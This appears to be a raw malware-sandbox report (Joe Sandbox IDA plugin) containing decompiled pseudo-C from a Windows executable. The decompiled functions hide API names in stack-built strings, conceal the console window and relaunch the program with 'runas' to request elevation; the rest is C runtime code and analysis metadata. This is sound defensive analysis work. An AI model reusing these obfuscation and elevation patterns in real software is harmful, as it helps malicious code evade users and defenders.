401f99 8289->8291 8290->8291 8304 4069b2 8290->8304 8293 401fb1 8291->8293 8294 401fb6 __stbuf 8293->8294 8335 403df0 8294->8335 8296 401fc1 8296->8212 8298 406ba2 8297->8298 8299 406bbf 8297->8299 8300 40233d __write_nolock 69 API calls 8298->8300 8299->8247 8301 406ba7 8300->8301 8302 403b7b __write_nolock 5 API calls 8301->8302 8303 406bb7 8302->8303 8303->8247 8305 4069c7 8304->8305 8309 4069e8 8304->8309 8306 406b97 __output_l 69 API calls 8305->8306 8305->8309 8307 4069e1 8306->8307 8310 408baa 8307->8310 8309->8291 8311 408bb6 __msize 8310->8311 8312 408bd9 8311->8312 8313 408bbe 8311->8313 8315 408be7 8312->8315 8318 408c28 8312->8318 8314 402350 __write_nolock 69 API calls 8313->8314 8316 408bc3 8314->8316 8317 402350 __write_nolock 69 API calls 8315->8317 8319 40233d __write_nolock 69 API calls 8316->8319 8320 408bec 8317->8320 8321 40a063 ___lock_fhandle 70 API calls 8318->8321 8328 408bcb __msize 8319->8328 8322 40233d __write_nolock 69 API calls 8320->8322 8323 408c2e 8321->8323 8324 408bf3 8322->8324 8325 408c51 8323->8325 8326 408c3b 8323->8326 8327 403b7b __write_nolock 5 API calls 8324->8327 8330 40233d __write_nolock 69 API calls 8325->8330 8329 4085e4 __write_nolock 101 API calls 8326->8329 8327->8328 8328->8309 8331 408c49 8329->8331 8332 408c56 8330->8332 8334 408c7c __locking LeaveCriticalSection 8331->8334 8333 402350 __write_nolock 69 API calls 8332->8333 8333->8331 8334->8328 8336 403e04 LeaveCriticalSection 8335->8336 8337 403df9 8335->8337 8336->8296 8340 4024d4 LeaveCriticalSection 8337->8340 8339 403e02 8339->8296 8340->8339 8342 401615 __EH_prolog3_GS 8341->8342 8393 40107d 8342->8393 8344 401632 VariantInit 8345 401660 8344->8345 8346 401664 VariantClear SysFreeString 8345->8346 8347 401685 8345->8347 8399 40c7fb 8346->8399 8402 4010d7 8347->8402 8351 40169f 8352 4016e1 InterlockedDecrement 8351->8352 8356 401702 ctype 8351->8356 8354 4016f1 8352->8354 8352->8356 8353 401a65 8355 4016fb SysFreeString 8354->8355 8354->8356 8355->8356 8356->8353 8408 40116f VariantInit 8356->8408 8359 401792 VariantClear 8359->8353 8361 4017b2 SafeArrayGetDim 8359->8361 8360 40178c _com_util::ConvertStringToBSTR 8360->8359 8361->8353 8362 4017c9 SafeArrayGetLBound SafeArrayGetUBound SafeArrayAccessData 8361->8362 8363 401858 8362->8363 8364 40185e GetEnvironmentVariableW 8362->8364 8363->8364 8365 4018ca 8364->8365 8366 40189b lstrcatW lstrcatW 8364->8366 8367 4011f5 6 API calls 8365->8367 8366->8365 8368 4018d4 GetProcAddress 8367->8368 8369 4018e7 8368->8369 8370 401237 6 API calls 8369->8370 8371 401978 GetProcAddress 8370->8371 8372 401237 6 API calls 8371->8372 8373 40198b GetProcAddress 8372->8373 8374 401237 6 API calls 8373->8374 8375 40199e GetProcAddress 8374->8375 8377 4019b8 SafeArrayUnaccessData 8375->8377 8377->8353 8383 401371 __EH_prolog3_GS 8378->8383 8379 40140f SysFreeString 8380 4015f3 8379->8380 8381 40c7fb 5 API calls 8380->8381 8382 4015f8 8381->8382 8382->8238 8383->8379 8384 4013ff 8383->8384 8385 40141f 8383->8385 8384->8379 8386 40107d 5 API calls 8385->8386 8387 4014de VariantClear 8386->8387 8388 401503 SysStringByteLen SysAllocStringByteLen 8387->8388 8389 4014ff VariantClear SysFreeString SysFreeString SysFreeString 8387->8389 8388->8389 8391 4015b3 SysFreeString 8389->8391 8391->8380 8394 401084 8393->8394 8395 40108c SysAllocString 8393->8395 8394->8344 8395->8394 8396 40109c 8395->8396 8397 4010b2 8396->8397 8414 401000 8396->8414 8397->8344 8400 401ceb __write_nolock 5 API calls 8399->8400 8401 40c805 8400->8401 8401->8401 8403 4010e3 __EH_prolog3 8402->8403 8420 401de6 8403->8420 8406 40110d _com_util::ConvertStringToBSTR 8406->8351 8409 40118d 8408->8409 8410 40119d 8409->8410 8459 40a7e0 8409->8459 8463 401e55 8410->8463 8413 4011ad VariantCopy 8413->8359 8413->8360 8415 401057 8414->8415 8416 40100f MultiByteToWideChar SysAllocStringLen 8414->8416 8415->8397 8416->8415 8418 40103d MultiByteToWideChar 8416->8418 8418->8415 8419 40104e SysFreeString 8418->8419 8419->8415 8423 401dee 8420->8423 8421 40354c _malloc 69 API calls 8421->8423 8422 4010ea 8422->8406 8432 40a860 8422->8432 8423->8421 8423->8422 8424 403619 _malloc 5 API calls 8423->8424 8427 401e0a 8423->8427 8424->8423 8425 401e30 8450 40333c 8425->8450 8427->8425 8429 4034eb __cinit 76 API calls 8427->8429 8429->8425 8431 401e4f 8433 40a89d lstrlenA MultiByteToWideChar 8432->8433 8443 40a8d9 _com_util::ConvertStringToBSTR 8432->8443 8434 40a8c5 GetLastError 8433->8434 8435 40a8f9 8433->8435 8437 40a8e0 GetLastError 8434->8437 8438 40a8d1 GetLastError 8434->8438 8440 40354c _malloc 69 API calls 8435->8440 8441 40a90b __alloca_probe_16 8435->8441 8436 401ceb __write_nolock 5 API calls 8439 40a9db 8436->8439 8437->8443 8438->8443 8439->8406 8440->8441 8442 40a967 MultiByteToWideChar 8441->8442 8441->8443 8444 40a996 SysAllocString 8442->8444 8445 40a97c 8442->8445 8443->8436 8444->8443 8446 40a9a7 8444->8446 8445->8434 8447 401cfa __freefls@4 69 API calls 8445->8447 8448 401cfa __freefls@4 69 API calls 8446->8448 8449 40a98e 8447->8449 8448->8443 8449->8434 8451 403358 _strlen 8450->8451 8455 401e3a 8450->8455 8452 40354c _malloc 69 API calls 8451->8452 8451->8455 8453 40336b 8452->8453 8454 40645e _strcpy_s 69 API calls 8453->8454 8453->8455 8454->8455 8456 40363b 8455->8456 8457 40366e RaiseException 8456->8457 8458 403662 8456->8458 8457->8431 8458->8457 8460 40a83a 8459->8460 8461 40a7f0 8459->8461 8460->8410 8461->8460 8462 40a82a GetErrorInfo 8461->8462 8462->8460 8466 401e67 _memset 8463->8466 8468 401e63 _memcpy_s 8463->8468 8464 401e6c 8465 40233d __write_nolock 69 API calls 8464->8465 8467 401e71 8465->8467 8466->8464 8466->8468 8470 401eb6 8466->8470 8469 403b7b __write_nolock 5 API calls 8467->8469 8468->8413 8469->8468 8470->8468 8471 40233d __write_nolock 69 API calls 8470->8471 8471->8467 8473 404b4d __msize 8472->8473 8474 4025ac __lock 69 API calls 8473->8474 8475 404b54 8474->8475 8476 404b90 _doexit 8475->8476 8478 4057a9 __decode_pointer 5 API calls 8475->8478 8486 404bfa 8476->8486 8480 404b83 8478->8480 8481 4057a9 __decode_pointer 5 API calls 8480->8481 8481->8476 8483 404bee 8484 4049dd _doexit 3 API calls 8483->8484 8485 404bf7 __msize 8484->8485 8485->8038 8487 404c00 8486->8487 8488 404bdb 8486->8488 8491 4024d4 LeaveCriticalSection 8487->8491 8488->8485 8490 4024d4 LeaveCriticalSection 8488->8490 8490->8483 8491->8488

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 91%
                                                                                              			E004012D3(void* __ebx, intOrPtr __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v9;
                                                                                              				char _v10;
                                                                                              				char _v11;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				char _v16;
                                                                                              				struct _SHELLEXECUTEINFOW _v76;
                                                                                              				void* __edi;
                                                                                              				signed int _t20;
                                                                                              				struct HINSTANCE__* _t23;
                                                                                              				int _t28;
                                                                                              				void* _t33;
                                                                                              				signed int _t36;
                                                                                              
                                                                                              				_t20 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t20 ^ _t36;
                                                                                              				_v16 = 0x53;
                                                                                              				_v15 = 0x48;
                                                                                              				_v14 = 0x45;
                                                                                              				_v13 = 0x4c;
                                                                                              				_v12 = 0x4c;
                                                                                              				_v11 = 0x33;
                                                                                              				_v10 = 0x32;
                                                                                              				_v9 = 0;
                                                                                              				_t23 = LoadLibraryA( &_v16); // executed
                                                                                              				E00403690(GetProcAddress(_t23, "ShellExecuteExW"),  &(_v76.fMask), 0, 0x38);
                                                                                              				_v76.cbSize = 0x3c;
                                                                                              				_v76.fMask = 0x440;
                                                                                              				_v76.lpParameters = L"-h";
                                                                                              				_v76.nShow = 1;
                                                                                              				_v76.lpFile = __esi;
                                                                                              				_v76.lpVerb = L"runas";
                                                                                              				_t28 = ShellExecuteExW( &_v76); // executed
                                                                                              				return E00401CEB(_t28, __ebx, _v8 ^ _t36, _t33, _t24, __esi);
                                                                                              			}



















                                                                                              0x004012d9
                                                                                              0x004012e0
                                                                                              0x004012ed
                                                                                              0x004012f1
                                                                                              0x004012f5
                                                                                              0x004012f9
                                                                                              0x004012fd
                                                                                              0x00401301
                                                                                              0x00401305
                                                                                              0x00401309
                                                                                              0x0040130d
                                                                                              0x00401324
                                                                                              0x00401330
                                                                                              0x00401337
                                                                                              0x0040133e
                                                                                              0x00401345
                                                                                              0x0040134c
                                                                                              0x0040134f
                                                                                              0x00401356
                                                                                              0x00401364

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?,ShellExecuteExW), ref: 0040130D
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401314
                                                                                              • _memset.LIBCMT ref: 00401324
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00401356
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressExecuteLibraryLoadProcShell_memset
                                                                                              • String ID: 2$3$<$E$H$L$L$S$ShellExecuteExW$h3A
                                                                                              • API String ID: 729207603-3496667079
                                                                                              • Opcode ID: 5967244061c1e35069673c4d3c9d3a767de3791d97ab794e1d891aba65960d47
                                                                                              • Instruction ID: d2cff99581d7257650747841244470f7bd59b2de5b0a40f233b564b28a75e520
                                                                                              • Opcode Fuzzy Hash: 5967244061c1e35069673c4d3c9d3a767de3791d97ab794e1d891aba65960d47
                                                                                              • Instruction Fuzzy Hash: AB1133B0D0424CEAEB01DBE8D8497CDBFF85F15308F5480AAD504BA281D7B95749CB69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 64%
                                                                                              			E00401BFF(void* __ebx, void* __edx, void* __eflags) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				signed int _t21;
                                                                                              				struct HWND__* _t24;
                                                                                              				struct HINSTANCE__* _t26;
                                                                                              				_Unknown_base(*)()* _t27;
                                                                                              				_Unknown_base(*)()* _t30;
                                                                                              				void* _t33;
                                                                                              				void* _t37;
                                                                                              				void* _t38;
                                                                                              				void* _t44;
                                                                                              				void* _t45;
                                                                                              				intOrPtr _t46;
                                                                                              				void* _t47;
                                                                                              				void* _t48;
                                                                                              				void* _t49;
                                                                                              				void* _t51;
                                                                                              				signed int _t52;
                                                                                              				void* _t54;
                                                                                              
                                                                                              				_t44 = __edx;
                                                                                              				_t38 = __ebx;
                                                                                              				_t52 = _t54 - 0x1b0;
                                                                                              				_t21 =  *0x41205c; // 0xc28b62e0
                                                                                              				 *(_t52 + 0x1ac) = _t21 ^ _t52;
                                                                                              				_t46 =  *((intOrPtr*)(_t52 + 0x1bc));
                                                                                              				 *(_t52 - 0x80) = 0x736e6f43;
                                                                                              				 *((intOrPtr*)(_t52 - 0x7c)) = 0x57656c6f;
                                                                                              				 *((intOrPtr*)(_t52 - 0x78)) = 0x6f646e69;
                                                                                              				 *((intOrPtr*)(_t52 - 0x74)) = 0x616c4377;
                                                                                              				 *((intOrPtr*)(_t52 - 0x70)) = 0x7373;
                                                                                              				_t24 = FindWindowA(_t52 - 0x80, 0); // executed
                                                                                              				 *(_t52 - 0x60) = _t24;
                                                                                              				 *(_t52 - 0x6c) = 0x776f6853;
                                                                                              				 *((intOrPtr*)(_t52 - 0x68)) = 0x646e6957;
                                                                                              				 *((intOrPtr*)(_t52 - 0x64)) = 0x776f;
                                                                                              				_t26 = E004011F5();
                                                                                              				_t49 = GetProcAddress;
                                                                                              				_t27 = GetProcAddress(_t26, _t52 - 0x6c);
                                                                                              				 *_t27( *(_t52 - 0x60), 0, _t45, _t48); // executed
                                                                                              				if( *((intOrPtr*)(_t52 + 0x1b8)) < 2) {
                                                                                              					L2:
                                                                                              					_t30 = GetProcAddress(E00401237(), "GetModuleFileNameW");
                                                                                              					 *_t30(0, _t52 - 0x5c, 0x208);
                                                                                              					_push("\n");
                                                                                              					E00401F15(_t38, _t44, _t46, _t49, _t59);
                                                                                              					_t33 = E004012D3(_t38, _t52 - 0x5c, _t59); // executed
                                                                                              					if(_t33 == 0) {
                                                                                              						goto L3;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t37 = E00401281( *((intOrPtr*)(_t46 + 4)));
                                                                                              					_t59 = _t37;
                                                                                              					if(_t37 != 0) {
                                                                                              						L3:
                                                                                              						E00401A7C(_t38, _t46);
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              				_pop(_t47);
                                                                                              				_pop(_t51);
                                                                                              				return E00401CEB(0, _t38,  *(_t52 + 0x1ac) ^ _t52, _t44, _t47, _t51);
                                                                                              			}























                                                                                              0x00401bff
                                                                                              0x00401bff
                                                                                              0x00401c00
                                                                                              0x00401c0d
                                                                                              0x00401c14
                                                                                              0x00401c1c
                                                                                              0x00401c28
                                                                                              0x00401c2f
                                                                                              0x00401c36
                                                                                              0x00401c3d
                                                                                              0x00401c44
                                                                                              0x00401c4b
                                                                                              0x00401c51
                                                                                              0x00401c58
                                                                                              0x00401c5f
                                                                                              0x00401c66
                                                                                              0x00401c6d
                                                                                              0x00401c72
                                                                                              0x00401c79
                                                                                              0x00401c80
                                                                                              0x00401c89
                                                                                              0x00401c97
                                                                                              0x00401ca2
                                                                                              0x00401caf
                                                                                              0x00401cb1
                                                                                              0x00401cb6
                                                                                              0x00401cbf
                                                                                              0x00401cc6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401c8b
                                                                                              0x00401c8e
                                                                                              0x00401c93
                                                                                              0x00401c95
                                                                                              0x00401cc8
                                                                                              0x00401cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401c95
                                                                                              0x00401cd3
                                                                                              0x00401cd8
                                                                                              0x00401ce5

                                                                                              APIs
                                                                                              • FindWindowA.USER32 ref: 00401C4B
                                                                                                • Part of subcall function 004011F5: LoadLibraryA.KERNEL32(?), ref: 00401225
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401C79
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00401CA2
                                                                                              • _printf.LIBCMT ref: 00401CB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FindLibraryLoadWindow_printf
                                                                                              • String ID: Cons$GetModuleFileNameW$Show$Wind$indo$oleW$wCla
                                                                                              • API String ID: 4109347808-2035152800
                                                                                              • Opcode ID: ab9e402c39f3db03a9e6f490dabb7771ea5acc1fa91257ad0968f9b288d374bc
                                                                                              • Instruction ID: 9f4aaa242b01a8d089edb52fe56bba463b1dc43577be2ecde087a090ecd04699
                                                                                              • Opcode Fuzzy Hash: ab9e402c39f3db03a9e6f490dabb7771ea5acc1fa91257ad0968f9b288d374bc
                                                                                              • Instruction Fuzzy Hash: 0D214C71D443089AEB20AFE6CD05BDEBBB4AF45708F10402EE518BB291DB745905CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 25 4011b7-4011ee LoadLibraryA call 401ceb 27 4011f3-4011f4 25->27
                                                                                              C-Code - Quality: 84%
                                                                                              			E004011B7() {
                                                                                              				signed int _v8;
                                                                                              				char _v11;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				char _v16;
                                                                                              				signed int _t10;
                                                                                              				struct HINSTANCE__* _t13;
                                                                                              				void* _t15;
                                                                                              				void* _t18;
                                                                                              				void* _t19;
                                                                                              				void* _t20;
                                                                                              				signed int _t21;
                                                                                              
                                                                                              				_t10 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t10 ^ _t21;
                                                                                              				_v16 = 0x4f;
                                                                                              				_v15 = 0x4c;
                                                                                              				_v14 = 0x45;
                                                                                              				_v13 = 0x33;
                                                                                              				_v12 = 0x32;
                                                                                              				_v11 = 0;
                                                                                              				_t13 = LoadLibraryA( &_v16); // executed
                                                                                              				return E00401CEB(_t13, _t15, _v8 ^ _t21, _t18, _t19, _t20);
                                                                                              			}

















                                                                                              0x004011bd
                                                                                              0x004011c4
                                                                                              0x004011cb
                                                                                              0x004011cf
                                                                                              0x004011d3
                                                                                              0x004011d7
                                                                                              0x004011db
                                                                                              0x004011df
                                                                                              0x004011e3
                                                                                              0x004011f4

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 004011E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: 2$3$E$L$O
                                                                                              • API String ID: 1029625771-1326206698
                                                                                              • Opcode ID: 37ddf80213864c935521ff1a0ca68650f738da7169017fc645111976a789a687
                                                                                              • Instruction ID: b070fd324750b4e589c379347d3a5baa0da49bff3d0e28845f6655d60a472481
                                                                                              • Opcode Fuzzy Hash: 37ddf80213864c935521ff1a0ca68650f738da7169017fc645111976a789a687
                                                                                              • Instruction Fuzzy Hash: 68E06D20D0828CEAEB02DBA8C44878DFFF45F19308F4480FAC545A7282C6B95B08C76A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 28 40ee90-40ee95 call 4011b7 30 40ee9a-40eea6 GetProcAddress 28->30
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040EE90() {
                                                                                              				struct HINSTANCE__* _t1;
                                                                                              				_Unknown_base(*)()* _t2;
                                                                                              
                                                                                              				_t1 = E004011B7(); // executed
                                                                                              				_t2 = GetProcAddress(_t1, "CoInitializeSecurity");
                                                                                              				 *0x414378 = _t2;
                                                                                              				return _t2;
                                                                                              			}





                                                                                              0x0040ee95
                                                                                              0x0040ee9b
                                                                                              0x0040eea1
                                                                                              0x0040eea6

                                                                                              APIs
                                                                                                • Part of subcall function 004011B7: LoadLibraryA.KERNELBASE(?), ref: 004011E3
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 0040EE9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: CoInitializeSecurity
                                                                                              • API String ID: 2574300362-4240294626
                                                                                              • Opcode ID: 1c80595df9b833abbc0ffe9b761787ffcb0a81ea526386484b6eb903005ebfc9
                                                                                              • Instruction ID: 9f34bcb32ddcfdc394a745b5dcded235dfe97c811aa8dd2436477b243bfc2288
                                                                                              • Opcode Fuzzy Hash: 1c80595df9b833abbc0ffe9b761787ffcb0a81ea526386484b6eb903005ebfc9
                                                                                              • Instruction Fuzzy Hash: D1B012B45003008AC7442BB06C4A8C4355469C5706B104036BC80A11E1CB7800C4851C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 31 4023dc-4023fa HeapCreate 32 4023fc-4023fe 31->32 33 4023ff-40240c call 402381 31->33 36 402432-402435 33->36 37 40240e-40241b call 4025dd 33->37 37->36 40 40241d-402430 HeapDestroy 37->40 40->32
                                                                                              C-Code - Quality: 100%
                                                                                              			E004023DC(intOrPtr _a4) {
                                                                                              				void* _t6;
                                                                                              				intOrPtr _t7;
                                                                                              				void* _t10;
                                                                                              
                                                                                              				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                              				 *0x4136c4 = _t6;
                                                                                              				if(_t6 != 0) {
                                                                                              					_t7 = E00402381(__eflags);
                                                                                              					__eflags = _t7 - 3;
                                                                                              					 *0x4154dc = _t7;
                                                                                              					if(_t7 != 3) {
                                                                                              						L5:
                                                                                              						__eflags = 1;
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						_t10 = E004025DD(0x3f8);
                                                                                              						__eflags = _t10;
                                                                                              						if(_t10 != 0) {
                                                                                              							goto L5;
                                                                                              						} else {
                                                                                              							HeapDestroy( *0x4136c4);
                                                                                              							 *0x4136c4 =  *0x4136c4 & 0x00000000;
                                                                                              							goto L1;
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					L1:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}






                                                                                              0x004023ed
                                                                                              0x004023f5
                                                                                              0x004023fa
                                                                                              0x004023ff
                                                                                              0x00402404
                                                                                              0x00402407
                                                                                              0x0040240c
                                                                                              0x00402432
                                                                                              0x00402434
                                                                                              0x00402435
                                                                                              0x0040240e
                                                                                              0x00402413
                                                                                              0x00402418
                                                                                              0x0040241b
                                                                                              0x00000000
                                                                                              0x0040241d
                                                                                              0x00402423
                                                                                              0x00402429
                                                                                              0x00000000
                                                                                              0x00402429
                                                                                              0x0040241b
                                                                                              0x004023fc
                                                                                              0x004023fc
                                                                                              0x004023fe
                                                                                              0x004023fe

                                                                                              APIs
                                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402100,00000001), ref: 004023ED
                                                                                              • HeapDestroy.KERNEL32 ref: 00402423
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$CreateDestroy
                                                                                              • String ID:
                                                                                              • API String ID: 3296620671-0
                                                                                              • Opcode ID: a131ef775c530a9048c5d8b5efe914f6bc2c873be768279543b9265d12e788b3
                                                                                              • Instruction ID: 96965bdb1dc1c0849ef74c9a43433e195be9a296e0fe1a9bd6facece3195750b
                                                                                              • Opcode Fuzzy Hash: a131ef775c530a9048c5d8b5efe914f6bc2c873be768279543b9265d12e788b3
                                                                                              • Instruction Fuzzy Hash: 59E03931A55301AEEB62DB31AF093663594A760747F00C87AF801F42E0EAB88944AA0D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 41 4049dd-4049eb call 4049b7 ExitProcess
                                                                                              C-Code - Quality: 100%
                                                                                              			E004049DD(int _a4) {
                                                                                              
                                                                                              				E004049B7(_a4);
                                                                                              				ExitProcess(_a4);
                                                                                              			}



                                                                                              0x004049e1
                                                                                              0x004049eb

                                                                                              APIs
                                                                                              • ___crtCorExitProcess.LIBCMT ref: 004049E1
                                                                                                • Part of subcall function 004049B7: GetModuleHandleA.KERNEL32(mscoree.dll,004049E6,00000001,00403585,000000FF,0000001E,00000001,00000000,00000000,?,00405DF8,00000000,00000001,00405965,00402536,00000018), ref: 004049BC
                                                                                                • Part of subcall function 004049B7: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004049CC
                                                                                              • ExitProcess.KERNEL32 ref: 004049EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                              • String ID:
                                                                                              • API String ID: 2427264223-0
                                                                                              • Opcode ID: 6de57fc3fe322b1e8f41ee8bd7396d770e77419fd6cf927f6642e364934a66af
                                                                                              • Instruction ID: 1a09df385b7b755eada441f34d8426531e187aeeae83b5c2070e58eaa71e2cc7
                                                                                              • Opcode Fuzzy Hash: 6de57fc3fe322b1e8f41ee8bd7396d770e77419fd6cf927f6642e364934a66af
                                                                                              • Instruction Fuzzy Hash: 2CB01270008100AFCA012B30DF0B40E7BA1FFC0700F00443DF148104719B314C10BA05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 44 404c0f-404c17 call 404b41 46 404c1c-404c1f 44->46
                                                                                              C-Code - Quality: 25%
                                                                                              			E00404C0F(intOrPtr _a4) {
                                                                                              				void* _t2;
                                                                                              				void* _t3;
                                                                                              				void* _t4;
                                                                                              				void* _t5;
                                                                                              				void* _t8;
                                                                                              
                                                                                              				_push(0);
                                                                                              				_push(0);
                                                                                              				_push(_a4);
                                                                                              				_t2 = E00404B41(_t3, _t4, _t5, _t8); // executed
                                                                                              				return _t2;
                                                                                              			}








                                                                                              0x00404c0f
                                                                                              0x00404c11
                                                                                              0x00404c13
                                                                                              0x00404c17
                                                                                              0x00404c1f

                                                                                              APIs
                                                                                              • _doexit.LIBCMT ref: 00404C17
                                                                                                • Part of subcall function 00404B41: __lock.LIBCMT ref: 00404B4F
                                                                                                • Part of subcall function 00404B41: __decode_pointer.LIBCMT ref: 00404B7E
                                                                                                • Part of subcall function 00404B41: __decode_pointer.LIBCMT ref: 00404B8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
